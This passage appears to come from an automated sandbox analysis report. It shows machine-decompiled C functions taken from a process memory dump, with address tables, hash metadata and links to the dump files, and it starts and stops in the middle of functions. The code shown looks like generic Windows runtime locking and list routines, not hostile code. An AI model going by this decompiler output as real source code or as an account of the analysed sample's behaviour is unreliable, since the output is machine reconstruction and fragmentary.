                        					_t88 = _t90 - _v12 - _t105;
                        					_t75 = _a4;
                        					asm("sbb edx, eax");
                        					_t31 = _t98 + 0xc8; // 0x2c5fb53
                        					_t101 = _t31;
                        					 *_t101 = _t88;
                        					_t101[1] = _t97;
                        					goto L15;
                        				}
                        			}









































                        0x02bbdbe9
                        0x02bbdbf2
                        0x02bbdbf7
                        0x02bbdbf9
                        0x02bbdbfc
                        0x02bbdc00
                        0x02bbdc03
                        0x02bbdc14
                        0x02bbdd54
                        0x02bbdd54
                        0x02bbdd54
                        0x02bbdc18
                        0x02bbdc1d
                        0x02bbdc1d
                        0x02bbdc32
                        0x02bbdc3b
                        0x02bbdc3e
                        0x02bbdc46
                        0x02bbdd5b
                        0x02bbdd62
                        0x02bbdd64
                        0x02bbdd67
                        0x02bbdd69
                        0x02bbdd6b
                        0x02bbdd6e
                        0x02bbdd70
                        0x02bbdd73
                        0x02bbdd73
                        0x00000000
                        0x02bbdc4c
                        0x02bbdc4e
                        0x02c03ae3
                        0x02c03ae8
                        0x02c03aea
                        0x02bbdce7
                        0x02bbdce9
                        0x02bbdcec
                        0x02bbdcee
                        0x02bbdcf0
                        0x02bbdcf3
                        0x02bbdcf5
                        0x02c03af2
                        0x02c03af5
                        0x02c03af5
                        0x02bbdd06
                        0x02bbdd08
                        0x02bbdd0b
                        0x02bbdd12
                        0x02c03b08
                        0x02bbdd18
                        0x02bbdd18
                        0x02bbdd18
                        0x02bbdd20
                        0x02bbdd23
                        0x02c03b16
                        0x02c03b16
                        0x02bbdd29
                        0x02bbdd2d
                        0x02bbdd36
                        0x02bbdd40
                        0x02bbdd51
                        0x02bbdd51
                        0x02bbdc54
                        0x02bbdc59
                        0x02bbdc59
                        0x02bbdc5e
                        0x02bbdc5e
                        0x02bbdc63
                        0x02bbdc66
                        0x02bbdc6b
                        0x02bbdc78
                        0x02bbdc7b
                        0x02bbdc81
                        0x02bbdc81
                        0x02bbdc83
                        0x02bbdc89
                        0x00000000
                        0x00000000
                        0x02bbdd7b
                        0x02bbdd7b
                        0x02bbdc8f
                        0x02bbdc8f
                        0x02bbdc92
                        0x02bbdc99
                        0x02bbdc9f
                        0x02bbdca5
                        0x02bbdcaa
                        0x02bbdcaa
                        0x02bbdcb3
                        0x02bbdcb8
                        0x02bbdcbb
                        0x02bbdcc1
                        0x02bbdccf
                        0x02bbdcd2
                        0x02bbdcd5
                        0x02bbdcd7
                        0x02bbdcda
                        0x02bbdcdc
                        0x02bbdcdc
                        0x02bbdce2
                        0x02bbdce4
                        0x00000000
                        0x02bbdce4

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9b7ca5af7ae5a755a652d9ccd8447e255ba8285323f4d4af71c945403df50363
                        • Instruction ID: a8f6a02eb76662c5353db419780ff3ecf64b6dca73a950ea574864765706e7dc
                        • Opcode Fuzzy Hash: 9b7ca5af7ae5a755a652d9ccd8447e255ba8285323f4d4af71c945403df50363
                        • Instruction Fuzzy Hash: 98519E71A00616DFCB15CFA8C490BEEBBF2FF49314F20869AD595A7340DBB5A944CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02BAEF40(intOrPtr __ecx) {
                        				char _v5;
                        				char _v6;
                        				char _v7;
                        				char _v8;
                        				signed int _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t58;
                        				char _t59;
                        				signed char _t69;
                        				void* _t73;
                        				signed int _t74;
                        				char _t79;
                        				signed char _t81;
                        				signed int _t85;
                        				signed int _t87;
                        				intOrPtr _t90;
                        				signed char* _t91;
                        				void* _t92;
                        				signed int _t94;
                        				void* _t96;
                        
                        				_t90 = __ecx;
                        				_v16 = __ecx;
                        				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
                        					_t58 =  *((intOrPtr*)(__ecx));
                        					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
                        						E02B99080(_t73, __ecx, __ecx, _t92);
                        					}
                        				}
                        				_t74 = 0;
                        				_t96 =  *0x7ffe036a - 1;
                        				_v12 = 0;
                        				_v7 = 0;
                        				if(_t96 > 0) {
                        					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
                        					_v12 = _t74;
                        					_v7 = _t96 != 0;
                        				}
                        				_t79 = 0;
                        				_v8 = 0;
                        				_v5 = 0;
                        				while(1) {
                        					L4:
                        					_t59 = 1;
                        					L5:
                        					while(1) {
                        						if(_t59 == 0) {
                        							L12:
                        							_t21 = _t90 + 4; // 0x779cc21e
                        							_t87 =  *_t21;
                        							_v6 = 0;
                        							if(_t79 != 0) {
                        								if((_t87 & 0x00000002) != 0) {
                        									goto L19;
                        								}
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000003;
                        								} else {
                        									_t51 = _t87 - 2; // -2
                        									_t74 = _t51;
                        								}
                        								goto L15;
                        							} else {
                        								if((_t87 & 0x00000001) != 0) {
                        									_v6 = 1;
                        									_t74 = _t87 ^ 0x00000001;
                        								} else {
                        									_t26 = _t87 - 4; // -4
                        									_t74 = _t26;
                        									if((_t74 & 0x00000002) == 0) {
                        										_t74 = _t74 - 2;
                        									}
                        								}
                        								L15:
                        								if(_t74 == _t87) {
                        									L19:
                        									E02B92D8A(_t74, _t90, _t87, _t90);
                        									_t74 = _v12;
                        									_v8 = 1;
                        									if(_v7 != 0 && _t74 > 0x64) {
                        										_t74 = _t74 - 1;
                        										_v12 = _t74;
                        									}
                        									_t79 = _v5;
                        									goto L4;
                        								}
                        								asm("lock cmpxchg [esi], ecx");
                        								if(_t87 != _t87) {
                        									_t74 = _v12;
                        									_t59 = 0;
                        									_t79 = _v5;
                        									continue;
                        								}
                        								if(_v6 != 0) {
                        									_t74 = _v12;
                        									L25:
                        									if(_v7 != 0) {
                        										if(_t74 < 0x7d0) {
                        											if(_v8 == 0) {
                        												_t74 = _t74 + 1;
                        											}
                        										}
                        										_t38 = _t90 + 0x14; // 0x0
                        										_t39 = _t90 + 0x14; // 0x0
                        										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
                        										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        											_t85 = _t85 & 0xff000000;
                        										}
                        										 *(_t90 + 0x14) = _t85;
                        									}
                        									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        									 *((intOrPtr*)(_t90 + 8)) = 1;
                        									return 0;
                        								}
                        								_v5 = 1;
                        								_t87 = _t74;
                        								goto L19;
                        							}
                        						}
                        						_t94 = _t74;
                        						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
                        						if(_t74 == 0) {
                        							goto L12;
                        						} else {
                        							_t91 = _t90 + 4;
                        							goto L8;
                        							L9:
                        							while((_t81 & 0x00000001) != 0) {
                        								_t69 = _t81;
                        								asm("lock cmpxchg [edi], edx");
                        								if(_t69 != _t81) {
                        									_t81 = _t69;
                        									continue;
                        								}
                        								_t90 = _v16;
                        								goto L25;
                        							}
                        							asm("pause");
                        							_t94 = _t94 - 1;
                        							if(_t94 != 0) {
                        								L8:
                        								_t81 =  *_t91;
                        								goto L9;
                        							} else {
                        								_t90 = _v16;
                        								_t79 = _v5;
                        								goto L12;
                        							}
                        						}
                        					}
                        				}
                        			}




























                        0x02baef4b
                        0x02baef4d
                        0x02baef57
                        0x02baf0bd
                        0x02baf0c2
                        0x02baf0d2
                        0x02baf0d2
                        0x02baf0c2
                        0x02baef5d
                        0x02baef5f
                        0x02baef67
                        0x02baef6a
                        0x02baef6d
                        0x02baef74
                        0x02baef7f
                        0x02baef82
                        0x02baef82
                        0x02baef86
                        0x02baef88
                        0x02baef8c
                        0x02baef8f
                        0x02baef8f
                        0x02baef8f
                        0x00000000
                        0x02baef91
                        0x02baef93
                        0x02baefc4
                        0x02baefc4
                        0x02baefc4
                        0x02baefca
                        0x02baefd0
                        0x02baf0a6
                        0x00000000
                        0x00000000
                        0x02baf0af
                        0x02bfbb06
                        0x02bfbb0a
                        0x02baf0b5
                        0x02baf0b5
                        0x02baf0b5
                        0x02baf0b5
                        0x00000000
                        0x02baefd6
                        0x02baefd9
                        0x02baf0de
                        0x02baf0e2
                        0x02baefdf
                        0x02baefdf
                        0x02baefdf
                        0x02baefe5
                        0x02bfbafc
                        0x02bfbafc
                        0x02baefe5
                        0x02baefeb
                        0x02baefed
                        0x02baf00f
                        0x02baf011
                        0x02baf01a
                        0x02baf01d
                        0x02baf021
                        0x02baf028
                        0x02baf029
                        0x02baf029
                        0x02baf02c
                        0x00000000
                        0x02baf02c
                        0x02baeff3
                        0x02baeff9
                        0x02baf0ea
                        0x02baf0ed
                        0x02baf0ef
                        0x00000000
                        0x02baf0ef
                        0x02baf003
                        0x02bfbb12
                        0x02baf045
                        0x02baf049
                        0x02baf051
                        0x02baf09e
                        0x02baf0a0
                        0x02baf0a0
                        0x02baf09e
                        0x02baf053
                        0x02baf064
                        0x02baf064
                        0x02baf06b
                        0x02bfbb1a
                        0x02bfbb1a
                        0x02baf071
                        0x02baf071
                        0x02baf07d
                        0x02baf082
                        0x02baf08f
                        0x02baf08f
                        0x02baf009
                        0x02baf00d
                        0x00000000
                        0x02baf00d
                        0x02baefd0
                        0x02baef97
                        0x02baefa5
                        0x02baefaa
                        0x00000000
                        0x02baefac
                        0x02baefac
                        0x02baefac
                        0x00000000
                        0x02baefb2
                        0x02baf036
                        0x02baf03a
                        0x02baf040
                        0x02baf090
                        0x00000000
                        0x02baf092
                        0x02baf042
                        0x00000000
                        0x02baf042
                        0x02baefb7
                        0x02baefb9
                        0x02baefbc
                        0x02baefb0
                        0x02baefb0
                        0x00000000
                        0x02baefbe
                        0x02baefbe
                        0x02baefc1
                        0x00000000
                        0x02baefc1
                        0x02baefbc
                        0x02baefaa
                        0x02baef91

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction ID: 6d6db6abb7f45f9a87ee0aa7ffa9c0175cc7b50dace15ccab5bf6f601430cc0d
                        • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                        • Instruction Fuzzy Hash: 7C51EF30A08249AFEB24CF68C0E17EEBBB1EF15318F1881F8D55597681C377A989C791
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 84%
                        			E02C6740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
                        				signed short* _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t55;
                        				void* _t56;
                        				intOrPtr* _t66;
                        				intOrPtr* _t69;
                        				void* _t74;
                        				intOrPtr* _t78;
                        				intOrPtr* _t81;
                        				intOrPtr* _t82;
                        				intOrPtr _t83;
                        				signed short* _t84;
                        				intOrPtr _t85;
                        				signed int _t87;
                        				intOrPtr* _t90;
                        				intOrPtr* _t93;
                        				intOrPtr* _t94;
                        				void* _t98;
                        
                        				_t84 = __edx;
                        				_t80 = __ecx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t55 = __ecx;
                        				_v8 = __edx;
                        				_t87 =  *__edx & 0x0000ffff;
                        				_v12 = __ecx;
                        				_t3 = _t55 + 0x154; // 0x154
                        				_t93 = _t3;
                        				_t78 =  *_t93;
                        				_t4 = _t87 + 2; // 0x2
                        				_t56 = _t4;
                        				while(_t78 != _t93) {
                        					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
                        						L4:
                        						_t78 =  *_t78;
                        						continue;
                        					} else {
                        						_t7 = _t78 + 0x18; // 0x18
                        						if(E02BED4F0(_t7, _t84[2], _t87) == _t87) {
                        							_t40 = _t78 + 0xc; // 0xc
                        							_t94 = _t40;
                        							_t90 =  *_t94;
                        							while(_t90 != _t94) {
                        								_t41 = _t90 + 8; // 0x8
                        								_t74 = E02BDF380(_a4, _t41, 0x10);
                        								_t98 = _t98 + 0xc;
                        								if(_t74 != 0) {
                        									_t90 =  *_t90;
                        									continue;
                        								}
                        								goto L12;
                        							}
                        							_t82 = L02BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        							if(_t82 != 0) {
                        								_t46 = _t78 + 0xc; // 0xc
                        								_t69 = _t46;
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								asm("movsd");
                        								_t85 =  *_t69;
                        								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        									L20:
                        									_t82 = 3;
                        									asm("int 0x29");
                        								}
                        								 *((intOrPtr*)(_t82 + 4)) = _t69;
                        								 *_t82 = _t85;
                        								 *((intOrPtr*)(_t85 + 4)) = _t82;
                        								 *_t69 = _t82;
                        								 *(_t78 + 8) =  *(_t78 + 8) + 1;
                        								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
                        								goto L11;
                        							} else {
                        								L18:
                        								_push(0xe);
                        								_pop(0);
                        							}
                        						} else {
                        							_t84 = _v8;
                        							_t9 = _t87 + 2; // 0x2
                        							_t56 = _t9;
                        							goto L4;
                        						}
                        					}
                        					L12:
                        					return 0;
                        				}
                        				_t10 = _t87 + 0x1a; // 0x1a
                        				_t78 = L02BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
                        				if(_t78 == 0) {
                        					goto L18;
                        				} else {
                        					_t12 = _t87 + 2; // 0x2
                        					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
                        					_t16 = _t78 + 0x18; // 0x18
                        					E02BDF3E0(_t16, _v8[2], _t87);
                        					 *((short*)(_t78 + _t87 + 0x18)) = 0;
                        					_t19 = _t78 + 0xc; // 0xc
                        					_t66 = _t19;
                        					 *((intOrPtr*)(_t66 + 4)) = _t66;
                        					 *_t66 = _t66;
                        					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
                        					_t81 = L02BB4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
                        					if(_t81 == 0) {
                        						goto L18;
                        					} else {
                        						_t26 = _t78 + 0xc; // 0xc
                        						_t69 = _t26;
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						asm("movsd");
                        						_t85 =  *_t69;
                        						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        							goto L20;
                        						} else {
                        							 *((intOrPtr*)(_t81 + 4)) = _t69;
                        							 *_t81 = _t85;
                        							 *((intOrPtr*)(_t85 + 4)) = _t81;
                        							 *_t69 = _t81;
                        							_t83 = _v12;
                        							 *(_t78 + 8) = 1;
                        							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							_t34 = _t83 + 0x154; // 0x1ba
                        							_t69 = _t34;
                        							_t85 =  *_t69;
                        							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
                        								goto L20;
                        							} else {
                        								 *_t78 = _t85;
                        								 *((intOrPtr*)(_t78 + 4)) = _t69;
                        								 *((intOrPtr*)(_t85 + 4)) = _t78;
                        								 *_t69 = _t78;
                        								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
                        							}
                        						}
                        						goto L11;
                        					}
                        				}
                        				goto L12;
                        			}





















                        0x02c6740d
                        0x02c6740d
                        0x02c67412
                        0x02c67413
                        0x02c67416
                        0x02c67418
                        0x02c6741c
                        0x02c6741f
                        0x02c67422
                        0x02c67422
                        0x02c67428
                        0x02c6742a
                        0x02c6742a
                        0x02c67451
                        0x02c67432
                        0x02c6744f
                        0x02c6744f
                        0x00000000
                        0x02c67434
                        0x02c67438
                        0x02c67443
                        0x02c67517
                        0x02c67517
                        0x02c6751a
                        0x02c67535
                        0x02c67520
                        0x02c67527
                        0x02c6752c
                        0x02c67531
                        0x02c67533
                        0x00000000
                        0x02c67533
                        0x00000000
                        0x02c67531
                        0x02c6754b
                        0x02c6754f
                        0x02c6755c
                        0x02c6755c
                        0x02c6755f
                        0x02c67560
                        0x02c67561
                        0x02c67562
                        0x02c67563
                        0x02c67568
                        0x02c6756a
                        0x02c6756c
                        0x02c6756d
                        0x02c6756d
                        0x02c6756f
                        0x02c67572
                        0x02c67574
                        0x02c67577
                        0x02c6757c
                        0x02c6757f
                        0x00000000
                        0x02c67551
                        0x02c67551
                        0x02c67551
                        0x02c67553
                        0x02c67553
                        0x02c67449
                        0x02c67449
                        0x02c6744c
                        0x02c6744c
                        0x00000000
                        0x02c6744c
                        0x02c67443
                        0x02c6750e
                        0x02c67514
                        0x02c67514
                        0x02c67455
                        0x02c67469
                        0x02c6746d
                        0x00000000
                        0x02c67473
                        0x02c67473
                        0x02c67476
                        0x02c67480
                        0x02c67484
                        0x02c6748e
                        0x02c67493
                        0x02c67493
                        0x02c67496
                        0x02c67499
                        0x02c674a1
                        0x02c674b1
                        0x02c674b5
                        0x00000000
                        0x02c674bb
                        0x02c674c1
                        0x02c674c1
                        0x02c674c4
                        0x02c674c5
                        0x02c674c6
                        0x02c674c7
                        0x02c674c8
                        0x02c674cd
                        0x00000000
                        0x02c674d3
                        0x02c674d3
                        0x02c674d6
                        0x02c674d8
                        0x02c674db
                        0x02c674dd
                        0x02c674e0
                        0x02c674e7
                        0x02c674ee
                        0x02c674ee
                        0x02c674f4
                        0x02c674f9
                        0x00000000
                        0x02c674fb
                        0x02c674fb
                        0x02c674fd
                        0x02c67500
                        0x02c67503
                        0x02c67505
                        0x02c67505
                        0x02c674f9
                        0x00000000
                        0x02c674cd
                        0x02c674b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction ID: e1699b9170c0fdc4b9062cdd9d2b4e03ea2e374ad79b355c9a1c0a2e54dba3eb
                        • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                        • Instruction Fuzzy Hash: 3D515C71600606EFDB15CF54C484AA6FBB5FF45308F1585EAE9099F212E371EA49CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E02BC2990() {
                        				signed int* _t62;
                        				signed int _t64;
                        				intOrPtr _t66;
                        				signed short* _t69;
                        				intOrPtr _t76;
                        				signed short* _t79;
                        				void* _t81;
                        				signed int _t82;
                        				signed short* _t83;
                        				signed int _t87;
                        				intOrPtr _t91;
                        				void* _t98;
                        				signed int _t99;
                        				void* _t101;
                        				signed int* _t102;
                        				void* _t103;
                        				void* _t104;
                        				void* _t107;
                        
                        				_push(0x20);
                        				_push(0x2c6ff00);
                        				E02BED08C(_t81, _t98, _t101);
                        				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
                        				_t99 = 0;
                        				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
                        				_t82 =  *((intOrPtr*)(_t103 + 0x10));
                        				if(_t82 == 0) {
                        					_t62 = 0xc0000100;
                        				} else {
                        					 *((intOrPtr*)(_t103 - 4)) = 0;
                        					_t102 = 0xc0000100;
                        					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
                        					_t64 = 4;
                        					while(1) {
                        						 *(_t103 - 0x24) = _t64;
                        						if(_t64 == 0) {
                        							break;
                        						}
                        						_t87 = _t64 * 0xc;
                        						 *(_t103 - 0x2c) = _t87;
                        						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x2b71664));
                        						if(_t107 <= 0) {
                        							if(_t107 == 0) {
                        								_t79 = E02BDE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x2b71668)), _t82);
                        								_t104 = _t104 + 0xc;
                        								__eflags = _t79;
                        								if(__eflags == 0) {
                        									_t102 = E02C151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x2b7166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
                        									break;
                        								} else {
                        									_t64 =  *(_t103 - 0x24);
                        									goto L5;
                        								}
                        								goto L13;
                        							} else {
                        								L5:
                        								_t64 = _t64 - 1;
                        								continue;
                        							}
                        						}
                        						break;
                        					}
                        					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        					__eflags = _t102;
                        					if(_t102 < 0) {
                        						__eflags = _t102 - 0xc0000100;
                        						if(_t102 == 0xc0000100) {
                        							_t83 =  *((intOrPtr*)(_t103 + 8));
                        							__eflags = _t83;
                        							if(_t83 != 0) {
                        								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
                        								__eflags =  *_t83 - _t99;
                        								if( *_t83 == _t99) {
                        									_t102 = 0xc0000100;
                        									goto L19;
                        								} else {
                        									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
                        									_t66 =  *((intOrPtr*)(_t91 + 0x10));
                        									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
                        									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
                        										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
                        										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
                        											L26:
                        											_t102 = E02BC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
                        											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        											__eflags = _t102 - 0xc0000100;
                        											if(_t102 != 0xc0000100) {
                        												goto L12;
                        											} else {
                        												_t99 = 1;
                        												_t83 =  *((intOrPtr*)(_t103 - 0x20));
                        												goto L18;
                        											}
                        										} else {
                        											_t69 = E02BA6600( *((intOrPtr*)(_t91 + 0x1c)));
                        											__eflags = _t69;
                        											if(_t69 != 0) {
                        												goto L26;
                        											} else {
                        												_t83 =  *((intOrPtr*)(_t103 + 8));
                        												goto L18;
                        											}
                        										}
                        									} else {
                        										L18:
                        										_t102 = E02BC2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
                        										L19:
                        										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
                        										goto L12;
                        									}
                        								}
                        								L28:
                        							} else {
                        								E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        								 *((intOrPtr*)(_t103 - 4)) = 1;
                        								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
                        								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
                        								_t76 = E02BC2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
                        								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
                        								__eflags = _t76 - 0xc0000100;
                        								if(_t76 == 0xc0000100) {
                        									 *((intOrPtr*)(_t103 - 0x1c)) = E02BC2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
                        								}
                        								 *((intOrPtr*)(_t103 - 4)) = _t99;
                        								E02BC2ACB();
                        							}
                        						}
                        					}
                        					L12:
                        					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
                        					_t62 = _t102;
                        				}
                        				L13:
                        				return E02BED0D1(_t62);
                        				goto L28;
                        			}





















                        0x02bc2990
                        0x02bc2992
                        0x02bc2997
                        0x02bc29a3
                        0x02bc29a6
                        0x02bc29ab
                        0x02bc29ad
                        0x02bc29b2
                        0x02c05c80
                        0x02bc29b8
                        0x02bc29b8
                        0x02bc29bb
                        0x02bc29c0
                        0x02bc29c5
                        0x02bc29c6
                        0x02bc29c6
                        0x02bc29cb
                        0x00000000
                        0x00000000
                        0x02bc29cd
                        0x02bc29d0
                        0x02bc29d9
                        0x02bc29db
                        0x02bc29dd
                        0x02bc2a7f
                        0x02bc2a84
                        0x02bc2a87
                        0x02bc2a89
                        0x02c05ca1
                        0x02c05ca3
                        0x00000000
                        0x02bc2a8f
                        0x02bc2a8f
                        0x00000000
                        0x02bc2a8f
                        0x00000000
                        0x02bc29e3
                        0x02bc29e3
                        0x02bc29e3
                        0x00000000
                        0x02bc29e3
                        0x02bc29dd
                        0x00000000
                        0x02bc29db
                        0x02bc29e6
                        0x02bc29e9
                        0x02bc29eb
                        0x02bc29ed
                        0x02bc29f3
                        0x02bc29f5
                        0x02bc29f8
                        0x02bc29fa
                        0x02bc2a97
                        0x02bc2a9a
                        0x02bc2a9d
                        0x02bc2add
                        0x00000000
                        0x02bc2a9f
                        0x02bc2aa2
                        0x02bc2aa5
                        0x02bc2aa8
                        0x02bc2aab
                        0x02c05cab
                        0x02c05caf
                        0x02c05cc5
                        0x02c05cda
                        0x02c05cdc
                        0x02c05cdf
                        0x02c05ce5
                        0x00000000
                        0x02c05ceb
                        0x02c05ced
                        0x02c05cee
                        0x00000000
                        0x02c05cee
                        0x02c05cb1
                        0x02c05cb4
                        0x02c05cb9
                        0x02c05cbb
                        0x00000000
                        0x02c05cbd
                        0x02c05cbd
                        0x00000000
                        0x02c05cbd
                        0x02c05cbb
                        0x02bc2ab1
                        0x02bc2ab1
                        0x02bc2ac4
                        0x02bc2ac6
                        0x02bc2ac6
                        0x00000000
                        0x02bc2ac6
                        0x02bc2aab
                        0x00000000
                        0x02bc2a00
                        0x02bc2a09
                        0x02bc2a0e
                        0x02bc2a21
                        0x02bc2a24
                        0x02bc2a35
                        0x02bc2a3a
                        0x02bc2a3d
                        0x02bc2a42
                        0x02bc2a59
                        0x02bc2a59
                        0x02bc2a5c
                        0x02bc2a5f
                        0x02bc2a5f
                        0x02bc29fa
                        0x02bc29f3
                        0x02bc2a64
                        0x02bc2a64
                        0x02bc2a6b
                        0x02bc2a6b
                        0x02bc2a6d
                        0x02bc2a72
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64bb4b9e6bb48b9f2baba37f6c11bc5eae66552566fbd472d7ed87b5ea5d43fe
                        • Instruction ID: b199a7f728d6765a58576e014ed2add3ad41f1d55d5ed4cdb5b47f590d5d0d16
                        • Opcode Fuzzy Hash: 64bb4b9e6bb48b9f2baba37f6c11bc5eae66552566fbd472d7ed87b5ea5d43fe
                        • Instruction Fuzzy Hash: 1B5147719002099FDF25DF58C880ADEBBB6BB48354F2580A9FC15AB260C3719952CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E02BC4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
                        				signed int _v8;
                        				short _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				char _v36;
                        				char _v156;
                        				short _v158;
                        				intOrPtr _v160;
                        				char _v164;
                        				intOrPtr _v168;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t45;
                        				intOrPtr _t74;
                        				signed char _t77;
                        				intOrPtr _t84;
                        				char* _t85;
                        				void* _t86;
                        				intOrPtr _t87;
                        				signed short _t88;
                        				signed int _t89;
                        
                        				_t83 = __edx;
                        				_v8 =  *0x2c8d360 ^ _t89;
                        				_t45 = _a8 & 0x0000ffff;
                        				_v158 = __edx;
                        				_v168 = __ecx;
                        				if(_t45 == 0) {
                        					L22:
                        					_t86 = 6;
                        					L12:
                        					E02B9CC50(_t86);
                        					L11:
                        					return E02BDB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
                        				}
                        				_t77 = _a4;
                        				if((_t77 & 0x00000001) != 0) {
                        					goto L22;
                        				}
                        				_t8 = _t77 + 0x34; // 0xdce0ba00
                        				if(_t45 !=  *_t8) {
                        					goto L22;
                        				}
                        				_t9 = _t77 + 0x24; // 0x2c88504
                        				E02BB2280(_t9, _t9);
                        				_t87 = 0x78;
